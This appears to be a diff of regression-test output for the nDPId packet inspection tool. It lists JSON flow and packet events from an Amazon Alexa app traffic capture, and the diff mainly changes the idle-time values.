-00882{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":817,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976058103,"flow_last_seen":1490976058166,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976058166,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34041,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00936{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":822,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976058103,"flow_last_seen":1490976058222,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976058222,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34041,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":843,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976064328,"flow_last_seen":1490976064328,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976064328,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42148,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":843,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1490976064328,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976064328,"pkt":"AMDKkaPvePiC0\/vCCABFAAA88S5AAEAGXAisECrYSBXOh6SkAbuyb6ZBAAAAAKAC\/\/8DBAAAAgQFtAQCCAoA9ldvAAAAAAEDAwg="} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":802,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976057977,"flow_last_seen":1490976057977,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976057977,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45688,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":802,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1490976057977,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976057977,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8quhAAEAGnAasECrYNF7ohrJ4AbvwDv4cAAAAAKAC\/\/9b6AAAAgQFtAQCCAoA9lT0AAAAAAEDAwg="} 
+00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":803,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":59,"flow_packet_id":2,"flow_last_seen":1490976058029,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976058029,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw9qRAAOcGqVU0XuiGrBAq2AG7snh1d2z38A7+HXASH\/7rbgAAAgQFtAEDAwY="} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":804,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":59,"flow_packet_id":3,"flow_last_seen":1490976058030,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976058030,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoqulAAEAGnBmsECrYNF7ohrJ4AbvwDv4ddXds+FAQAVc14AAA"} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":805,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976057977,"flow_last_seen":1490976058032,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976058032,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45688,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
+01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":806,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976057977,"flow_last_seen":1490976058082,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976058082,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45688,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":811,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976058103,"flow_last_seen":1490976058103,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976058103,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34041,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":811,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1490976058103,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976058103,"pkt":"AMDKkaPvePiC0\/vCCABFAAA87D9AAEAGJ+usECrYNu8YuoT5Abs\/ELk9AAAAAKAC\/\/9McwAAAgQFtAQCCAoA9lUCAAAAAAEDAwg="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":815,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":60,"flow_packet_id":2,"flow_last_seen":1490976058160,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976058160,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw5wBAAOcGhjU27xi6rBAq2AG7hPl2s2uGPxC5PnASH\/7cPAAAAgQFtAEDAwY="} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":816,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":60,"flow_packet_id":3,"flow_last_seen":1490976058162,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976058162,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo7EBAAEAGJ\/6sECrYNu8YuoT5Abs\/ELk+drNrh1AQAVcmrgAA"} +00882{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":817,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976058103,"flow_last_seen":1490976058166,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976058166,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34041,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00936{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":822,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976058103,"flow_last_seen":1490976058222,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976058222,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34041,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":843,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976064328,"flow_last_seen":1490976064328,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976064328,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42148,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":843,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1490976064328,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976064328,"pkt":"AMDKkaPvePiC0\/vCCABFAAA88S5AAEAGXAisECrYSBXOh6SkAbuyb6ZBAAAAAKAC\/\/8DBAAAAgQFtAQCCAoA9ldvAAAAAAEDAwg="} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":846,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976064333,"flow_last_seen":1490976064333,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1490976064333,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":44475,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":846,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1490976064333,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976064333,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8WldAAEARM2CsECrYrBAqAa27ADUAKN4THgkBAAABAAAAAAAAA3d3dwZhbWF6b24DY29tAAABAAE="} 
00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":846,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976064333,"flow_last_seen":1490976064333,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1490976064333,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":44475,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"www.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":847,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":61,"flow_packet_id":2,"flow_last_seen":1490976064389,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976064389,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwkwRAAOcGEz5IFc6HrBAq2AG7pKSpsxlXsm+mQnASH\/60aQAAAgQFtAEDAwY="} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":848,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":61,"flow_packet_id":3,"flow_last_seen":1490976064390,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976064390,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo8S9AAEAGXBusECrYSBXOh6SkAbuyb6ZCqbMZWFAQAVf+2gAA"} 
-00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":849,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976064328,"flow_last_seen":1490976064392,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":237,"flow_tot_l4_payload_len":237,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976064392,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42148,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":847,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":61,"flow_packet_id":2,"flow_last_seen":1490976064389,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976064389,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwkwRAAOcGEz5IFc6HrBAq2AG7pKSpsxlXsm+mQnASH\/60aQAAAgQFtAEDAwY="} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":848,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":61,"flow_packet_id":3,"flow_last_seen":1490976064390,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976064390,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo8S9AAEAGXBusECrYSBXOh6SkAbuyb6ZCqbMZWFAQAVf+2gAA"} 
+00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":849,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976064328,"flow_last_seen":1490976064392,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":237,"flow_tot_l4_payload_len":237,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976064392,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42148,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00658{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":850,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":62,"flow_packet_id":2,"flow_last_seen":1490976064448,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1490976064448,"pkt":"ePiC0\/vCAMDKkaPvCABFAAC91iFAAEARtxSsECoBrBAq2AA1rbsAqQ1IHgmBgAABAAYAAAAAA3d3dwZhbWF6b24DY29tAAABAAHADAAFAAEAAABFAAoDd3d3A2NkbsAQwCwABQABAAAAAwAfDmQzYWc0aHVra2g2MnluCmNsb3VkZnJvbnQDbmV0AMBCAAEAAQAAAAEABDRV0djAQgABAAEAAAABAAQ0VdHFwEIAAQABAAAAAQAENFXRj8BCAAEAAQAAAAEABDRV0Xo="} 
00790{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":850,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976064333,"flow_last_seen":1490976064448,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1490976064448,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":44475,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"www.amazon.com","num_queries":1,"num_answers":6,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.85.209.216"}} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":851,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976064452,"flow_last_seen":1490976064452,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976064452,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54434,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":851,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1490976064452,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976064452,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8L2dAAEAGLj+sECrYNFXR2NSiAbtfxHgaAAAAAKAC\/\/9kOQAAAgQFtAQCCAoA9ld9AAAAAAEDAwg="} 
-00909{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":854,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976064328,"flow_last_seen":1490976064454,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":237,"flow_tot_l4_payload_len":393,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1490976064454,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42148,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":862,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":63,"flow_packet_id":2,"flow_last_seen":1490976064505,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976064505,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPMGqqU0VdHYrBAq2AG71KJ+bVwJX8R4G6AScSBROQAAAgQFtAQCCAptHVo6APZXfQEDAwg="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":863,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":63,"flow_packet_id":3,"flow_last_seen":1490976064519,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976064519,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0L2hAAEAGLkasECrYNFXR2NSiAbtfxHgbfm1cCoAQAVfvyQAAAQEICgD2V4NtHVo6"} 
-00853{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":864,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976064452,"flow_last_seen":1490976064520,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1490976064520,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54434,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"5ee142340adf02ded757447e2ff78986","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00907{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":869,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976064452,"flow_last_seen":1490976064578,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":673,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1490976064578,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54434,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"5ee142340adf02ded757447e2ff78986","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 
+00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":851,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976064452,"flow_last_seen":1490976064452,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976064452,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54434,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":851,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1490976064452,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976064452,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8L2dAAEAGLj+sECrYNFXR2NSiAbtfxHgaAAAAAKAC\/\/9kOQAAAgQFtAQCCAoA9ld9AAAAAAEDAwg="} +00909{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":854,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976064328,"flow_last_seen":1490976064454,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":237,"flow_tot_l4_payload_len":393,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1490976064454,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42148,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 
